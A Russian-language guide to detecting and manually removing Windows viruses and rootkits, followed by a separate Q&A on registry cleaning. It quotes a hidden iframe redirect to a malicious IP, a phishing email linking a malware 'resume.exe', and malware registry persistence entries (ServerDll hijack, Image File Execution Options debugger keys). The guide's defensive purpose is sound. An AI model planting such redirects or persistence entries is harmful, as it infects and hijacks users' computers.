Поиск и удаление вирусов вручную. Как обнаружить и удалить вирус. Анализ системы. Обнаружение на лету. Как сомому справиться с вирусом ли трояном. Где прячется вирус. Вирусы и рееестр
Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или... много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус - это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) - гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами - не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.
Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден - должна быть запущена какая-то программа. Идеально - с административными правами, желательно - без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. - большинство грамотных пользователей данную опцию отключили навсегда.
Для отключения функций автозапуска в Windows XP/2000 reg-файл для импорта в реестр.
Для Windows 7 и более поздних отключение автозапуска можно выполнить с использованием апплета "Автозапуск" панели управления. В этом случае отключение действует по отношению к текущему пользователю. Более надежным способом защиты от внедрения вирусов, переносимых на съемных устройствах, является блокировка автозапуска для всех пользователей с помощью групповых политик:
Но основным "поставщиком" вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение - "Обозреватель Интернета" (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс - интерпретатор данных, полученных извне. Другими словами, - в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать "сайты для взрослых", сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами "скачать бесплатно" и " скачать без регистрации и SMS". Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы.
Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR"ом, а изменения в реестре отменены PT Startup Monitor"ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:
iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"
Означающий выполнение CGI-сценария сервера с IP - адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат - вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега "iframe" сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.
В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами - так называемые руткит (rootkit) - технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.
Удаление "качественного" вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами - вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, - все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.
Развитие антивирусов тоже не стоит на месте, - они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет "не по зубам" любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса - это работа, которую рано или поздно придется выполнять любому пользователю компьютера.
Здравствуйте.
Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
наш фирменный бланк резюме и отправить его по адресу [email protected]
Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
позвоним Вам в течение нескольких дней. Не забудьте
указать телефон, а также позицию, на которую Вы претендуете. Желательно
также указать пожелания по окладу.
Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
http://verano-konwektor.pl/resume.exe
Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.
Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего,
получите
троянскую программу на свой компьютер.
Скачиваю файл resume.exe. Размер - 159744 байта. Пока не запускаю.
Копирую
файл на другие компьютеры, где установлены различные антивирусы - просто для
очередной проверки их эффективности. Результаты не ахти - антивирус Avast 4.8
Home Edition деликатно промолчал. Подсунул его Symantec"у - та же реакция.
Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле,
не зря набирает популярность.
Все эксперименты выполняю на виртуальной машине с операционной системой
Windows XP. Учетная запись с правами администратора, поскольку, чаще всего
вирусы успешно внедряются в систему только, если пользователь является
локальным администратором.
Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал
свое черное дело.
Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка.
На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP.
Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) - надо же
оставить вирусу хоть какую-то возможность проявить свою активность.
Как правило, после внедрения, вирус должен связаться с хозяином или с заданным
сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете
сказанного выше, умный вирус может их замаскировать, кроме того, он может и
обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого
не произошло, но для надежного анализа сетевой активности весь трафик
зараженной машины лучше пустить через другую, незараженную, где можно быть
уверенным, что правила брандмауэра выполняются, а анализатор трафика (я
пользовался Wireshark"ом) выдает то, что есть на самом деле.
Перезагружаюсь.
Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет,
поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в
службах, ни в системных каталогах не появилось ничего нового.
Просмотр системного журнала дает только одну наводку - системе не удалось
запустить таинственную службу grande48
. Такой службы у меня быть не
могло, да и по времени это событие совпало с моментом внедрения.
Что еще наводит на мысль об успешном внедрении - так это отсутствие в реестре
записи о службе grande48 и отсутствие второго сообщения в журнале системы об
ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая
недоработка вирусописателей. Хотя и несущественная, ведь большинство
пользователей журнал событий не просматривают, да и на момент возникновения
подозрения на заражение эта запись в журнале уже может и отсутствовать.
Определяем наличие вируса в системе.
1. Наверняка должен быть "левый" трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось - один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.
2. Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Одна из наиболее популярных - Марка Руссиновича, которую можно скачать на странице раздела Windows Sysinternals сайта Microsoft. Инсталляция не требуется. Разархивируем и запускаем. Жмем "Scan". После непродолжительного сканирования видим результаты:
Кстати, даже не вникая в содержания строк, можно сразу заметить,
что имеются очень "свежие" по времени создания/модификации записи или файлы
(колонка "Timestamp")
. Нас в первую очередь должны заинтересовать файлы
с
описанием (колонка "Description"
) - "Hidden from Windows API"
- скрыто
от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений - это,
естественно, ненормально.
Два файла - grande48.sys
и
Yoy46.sys
- это как раз то, что мы
ищем. Это и есть
прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая
скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала -
это
нормальные драйверы Windows XP. Кроме того, вирус скрывал их
наличие только в папке \system32
, а их копии
в \system32\dllcache
остались
видимыми.
Напомню, что в Windows XP применяется специальный механизм защиты системных
файлов, называемый Windows File Protection (WFP)
. Задача WFP - автоматическое
восстановление важных системных файлов при их удалении или замене устаревшими
или неподписанными копиями. Все системные файлы Windows XP имеют цифровую
подпись и перечислены в специальной базе данных, используемой WFP. Для хранения
копий файлов используется папка \system32\dllcache
и, отчасти, \Windows\driver cache
. При удалении
или замене одного из системных файлов, WFP автоматически копирует "правильную"
его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache ,
то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP.
Попробуйте удалить vga.sys из \system32, и система тут же его восстановит,
используя копию из dllcache. А ситуация, когда, при работающей системе
восстановления файлов, файл драйвера есть в \dllcache и его не видно в
\system32 - это тоже дополнительный признак наличия руткита в системе.
Удаляем вирус из системы.
Осталось выполнить самое важное действие - удалить вирус. Самый простой и надежный способ - загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.
Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню - жмем R.
Выбираем систему (если их несколько):
Вводим пароль администратора.
Список драйверов и служб можно просмотреть с помощью команды listsvc:
В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:
Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:
Водим команду EXIT и система уходит на перезагрузку.
После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его
файлы и очистить реестр от его записей.
Можно проделать это вручную, а можно
использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения,
будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря
Данилова. Скачать можно отсюда -
http://freedrweb.ru
Там же можно скачать "Dr.Web LiveCD" - образ диска, который позволяет
восстановить работоспособность системы, пораженной действиями вирусов,
на рабочих станциях и серверах под управлением Windows\Unix, скопировать
важную информацию на сменные носители либо другой компьютер, если действия
вредоносных программ сделали невозможным загрузку компьютера.
Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и
подозрительных файлов, но и попытается вылечить зараженные объекты.
Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением.iso)
и записать его на CD. Будет создан загрузочный диск, загрузившись с которого,
руководствуетесь простым и понятным меню.
Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD,
можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить,
загрузившись в другой ОС, например, с использованием
Winternals ERD Commander. Для сканирования зараженной системы необходимо
указать именно ее жесткий диск (Режим "Выборочная проверка").
Сканер поможет вам найти файлы вируса, и вам останется лишь
удалить связанные с ним записи из реестра.
Поскольку вирусы научились прописываться на запуск в безопасном режиме
загрузки, не мешает проверить ветку реестра:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot
Разделы:
Minimal
- список драйверов и служб запускаемых в безопасном режиме
(Safe Mode)
Network
- то же, но с поддержкой сети.
Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и, естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.
Если у вас возникли сомнения относительно какого-либо файла, то можно
воспользоваться бесплатной онлайновой антивирусной службой
virustotal.com .
Через специальную форму на главной странице сайта закачиваете подозрительный
файл и ждете результатов. Сервисом virustotal используются консольные версии
множества антивирусов для проверки вашего подозреваемого файла.
Результаты выводятся на экран. Если файл является вредоносным, то с большой
долей вероятности, вы сможете это определить. В какой-то степени сервис
можно использовать для выбора "лучшего антивируса".
ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают
ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн - проверок
компьютера, браузера, файлов...
Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается "Диспетчер сеансов" (\SystemRoot\System32\smss.exe) , задача которого - запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services
Информация, предназначенная для диспетчера сеансов, находится в ключе реестра
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager
Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems
То найдете значения
ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll - это "правильные" файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:
ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)
Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится "синим экраном смерти" (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.
Поправить ситуацию можно так:
Загрузится в консоль восстановления (или в любой другой системе), и
скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку
под именем basepvllk32.dll. После чего система загрузится и можно будет
вручную подправить запись в реестре.
- загрузиться с использованием Winternals ERD Commander и исправить запись в
реестре на ServerDll=basesrv
. Или выполнить откат системы с
использованием точки восстановления.
Еще один характерный пример. Вредоносная программ регистрируется
как отладчик процесса explorer.exe, создавая в реестре запись типа:
"Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к
невозможности запуска explorer.exe. В результате вы получаете пустой рабочий
стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию
клавиш CTRL-ALT-DEL. Выбираете "Диспетчер задач" - "Новая задача" - "Обзор" - находите
и запускаете редактор реестра regedit.exe. Затем удаляете ключ
HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
и перезагружаетесь.
В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье "Проблемы с загрузкой ОС" раздела "Windows"
== Май 2008. ==
Дополнение
Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.
После удаления вируса ни один антивирус не работает.
Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный "Стрим Антивирус". Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы "Avira Antivir Guard". Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность - вирусов, руткитов и прочей гадости (Malware) в системе нет.
В какой-то момент попробовал запустить антивирусную утилиту AVZ . Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения
анализа результатов проверки системы за счет отметки легитимных объектов
цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
Но: исполняемый файл avz.exe не запустился! Переименовываю avz.exe в musor.exe - все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:
Опасно - отладчик процесса "avz.exe"="ntsd-d"
Опасно - отладчик процесса "avguard.exe"="ntsd-d"
:.
Это была уже серьезная зацепка. Поиск в реестре по контексту "avz" привел к обнаружению в ветке
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Раздела с именем avz.exe
, содержащем строковый параметр с именем
"Debugger"
и значением .
И, как выяснилось позже, в указанной ветке присутствовал не только раздел
"avz.exe", но и разделы с именами исполняемых модулей практически всех
известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe -
вполне легальный отладчик Windows, стандартно присутствующий во всех версиях
ОС, но подобная запись в реестре приводит к невозможности запуска приложения,
имя исполняемого файла которого совпадает с именем раздела???.exe.
После удаления из реестра всех разделов, c именем???.exe и содержащих запись "Debugger" = "ntsd -d" работоспособность системы полностью восстановилась.
В результате анализа ситуации с использованием параметра "ntsd -d" для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:
Windows Registry Editor Version 5.00
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
:.. и т.д.
Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте - в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем "Explorer.exe" - то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).
Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием - не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.
Наиболее простой и эффективный путь - загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.
Использование Dr.Web LiveCD - самый простой и не требующий специальных знаний способ. Скачиваете iso-образ CD, записываете его на болванку, загружаетесь с CD-ROM и запускаете сканер.
Использование Winternals ERD Commander. Загружаетесь с него, подключившись к зараженной системе, и выполняете откат на контрольную точку восстановления с датой, когда заражения еще не было. Выбираете меню System Tools - System Restore
. Если откат средствами ERD Commander"а выполнить невозможно, попробуйте вручную найти файлы реестра в данных контрольных точек и восстановить их в каталог Windows. Как это сделать я подробно описал в статье "Работа с реестром".
Загрузка в другой ОС и ручное удаление вируса. Самый сложный, но самый эффективный способ. В качестве другой ОС удобнее всего использовать тот же ERD Commander. Методика обнаружения и удаления вируса может быть следующей:
Переходите на диск зараженной системы и просматриваете системные каталоги на наличие исполняемых файлов и файлов драйверов с датой создания близкой к дате заражения. Перемещаете эти файлы в отдельную папку. Обратите внимание на каталоги
\Windows
\Windows\system32
\Windows\system32\drivers
\Windows\Tasks\
\RECYCLER
\System Volume Information
Каталоги пользователей \Documents And Settings\All Users
и
\Documents And Settings\имя пользователя
Очень удобно использовать для поиска таких файлов FAR Manager, с включенной сортировкой по дате для панели, где отображается содержимое каталога (комбинация CTRL-F5). Особое внимание стоит обратить на скрытые исполняемые файлы. Существует также эффективная и простая утилита от Nirsoft - SearchMyFiles, применение которой позволяет, в подавляющем большинстве случаев, легко обнаружить вредоносные файлы даже без использования антивируса. Способ обнаружения вредоносных файлов по времени создания (Creation time)
Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.
Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) - дает положительный эффект. Даже если вирус не обнаруживается антивирусами.
Если предыдущие методики не дали результата, остается одно - ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander"а имеются пункты:
Autoruns
- информация о параметрах запуска приложений и оболочке пользователя.
Service and Driver Manager
- информация о службах и драйверах системы.
Здравствуйте админ! Вопрос, как очистить реестр от накопившегося мусора: оставшихся ключей, параметров, значений удалённых программ, но сделать это хочу правильно, так как есть печальный опыт.
Совсем недавно устанавливал себе на компьютер одну программу и с удивлением обнаружил что вместе с ней установилась и другая, какой-то чистильщик операционной системы и реестра. Самое интересное эта программа стала запускаться вместе с Windows, постоянно предлагая очистить компьютер от различного мусора. Ради интереса я решил попробовать и нажал ОК, начался процесс очистки реестра от ненужных записей, через минуту проверка закончилась и программа выдала отчёт, было найдено 1024 ошибки, которые утилита предложила исправить, я согласился и опять нажал ОК, ошибки реестра были удалены и компьютер перезагрузился и больше уже не загрузился!
При следующей загрузке на чёрном экране вышла ошибка Windows\system32\config\system... и что-то там ещё. С огромным трудом операционную систему удалось восстановить по вашей статье .
Ещё на вашем сайте нашёл интересную статью, где производите чистку реестра от ключей оставленных вирусом не прибегая ни к каким программам. Поэтому я и решил вам написать, спросить как очистить реестр от мусора, да и вообще нужно ли это, ведь многие пользователи вообще никогда не очищают реестр и не задумываются об этом.
Как очистить реестр
1) Что такое реестр!
2) Так ли необходима очистка реестра.
3) Знаете ли вы, что если вредоносная программа оставит свои ключи в реестре, то ни один чистильщик реестра их не найдёт. Как найти ненужные ключи в реестре ручками не прибегая ни к каким программам.
3) Как очистить реестр программой EnhanceMySe7en
4) Как очистить реестр программой CCleaner
Привет друзья! Хороший задан вопрос и чтобы на него ответить, я в двух словах расскажу вам что такое реестр и как он используется Windows.
Реестр - важнейший компонент Windows, появился в древней Windows 3.1 в виде файла Req.dat .
Реестр содержит в себе огромную базу данных или хранилище конфигурационной информации всех установленных в операционную систему программ и самой Windows. Информация о всех пользователях, расширениях файлов, драйверах, подключенных устройствах, активациях и так далее, всё это хранится в реестре.
Любое приложение при своей установке в операционную систему оставляет свои конфигурационные данные в реестре и также любое приложение не удаляет все данные из реестра при свой деинсталляции (удалении) с компьютера. Это общеизвестный факт.
Например я удалю с компьютера программу Adobe Photoshop, а затем проверю реестр на наличии ключей этой программы и они там найдутся,
Тоже самое будет с программой Download Master.
А если удалить из Windows более серьёзную программу, к примеру , то обратите внимание сколько она оставит после себя в реестре мусора. А если представить что мы пользуемся операционной системой год!
Становится ясно, что всего этого хлама, оставленного программами после своего удаления с компьютера, в реестре остаётся довольно много, но вот ведь ещё какой вопрос друзья мои - А мешает ли весь этот хлам быстродействию операционной системы? То что мешает, доказать никому так и не удалось. Тому ли не доказательство то, что сам разработчик Windows всем известный Майкрософт так и не создал специального инструмента для своего детища, который бы производил автоматическую очистку реестра. есть, тоже присутствует, а вот очистить реестр можно только ручками специальным встроенным в Windows редактором regedit.
В каких случаях произвожу очистку реестра я сам
Друзья, в своё время я до тошноты экспериментировал с различными чистильщиками реестра, но к убедительному результату так и не пришёл. Я считаю, что нет большой необходимости в постоянной автоматической чистке реестра, так как ни одна автоматическая очистка так хороша как вам кажется. Если вы удалили какую-либо программу и она оставила свои ключи в реестре, то Windows к этим ключам никогда не обратится и из-за этих ключей ни в коей мере не будет происходить падение быстродействия системы и выходить какие-либо ошибки. Мусор в реестре может составлять несколько десятков килобайт ненужных разделов и не оказывать на скорость системы ощутимого воздействия
Но как удалять ненужные записи в реестре вы всё же должны знать и вот почему.
Для примера приведу реальный случай. Мой знакомый подхватил вредоносную программу запускавшую исполняемый файл из папки C:\Windows\AppPatch\hsgpxjt.exe. Вирус мы успешно удалили , но созданные в реестре вредоносной программой записи остались, так как при загрузке системы появлялось вот такое окно.
Ни одна из существующих автоматических чистилок реестра мне тогда не помогла, они просто не нашли вредоносные записи.
Пришлось ручками найти в реестре вредоносные ключи расположенные в кустах реестра
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Windows
Добавлены ключи
Load REG_SZ C:\WINDOWS\apppatch\hsgpxjt.exe
Run REG_SZ C:\WINDOWS\apppatch\hsgpxjt.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Добавлен ключ
userinit REG_SZ C:\Windows\apppatch\hsgpxjt.exe
Об этом случае я написал подробную статью " " можете почитать. Из этой статьи вы сможете узнать как найти ненужные ключи в реестре при помощи встроенного в Windows редактора regedit.
Ну а что пожелать пользователям, которые хотят иметь под руками автоматический инструмент для очистки реестра.
Как очистить реестр программой EnhanceMySe7en
Перед использованием программ чистильщиков реестра советую создать точку восстановления системы (прежде чем упасть подстелим соломенку)
Одно время я пользовался программой EnhanceMySe7en, это очень хороший твикер для Windows 7, включает два десятка удобных инструментов для управления Windows 7. EnhanceMySe7en содержит также менеджер автозагрузки, дефрагментатор жесткого диска, инструмент для мониторинга винчестера и диспетчер процессов (некоторые инструменты доступны только в платной версии). Эта классная программулька к сожалению на английском языке, но Вам всё будет понятно и так.
Официальный сайт программы http://seriousbit.com/tweak_windows_7/
Нажимаем Download v3.7.1, 12.6 MB и скачиваем бесплатную версию,
Она не содержит некоторые инструменты, например дефрагментатор жесткого диска.
Чтобы запустить очистку реестра нужно пройти на вкладку Tools и нажать всего лишь одну кнопку Registry Cleaner .
Затем можете посмотреть детали Details или сразу нажать на кнопку Delete Удалить ошибки.
Вот и всё, реестр очищен.
Как очистить реестр программой CCleaner
Ещё более простая программа CCleaner, которой пользуется подавляющее количество пользователей. Она установлена буквально у всех кому это надо и не надо. Мне иногда кажется что она входит в набор стандартных программ Windows. Какой бы мне компьютер не принесли на ремонт, так она там обязательно уже установлена.
Скачать программу можно на её официальном сайте
http://ccleaner.org.ua/download/
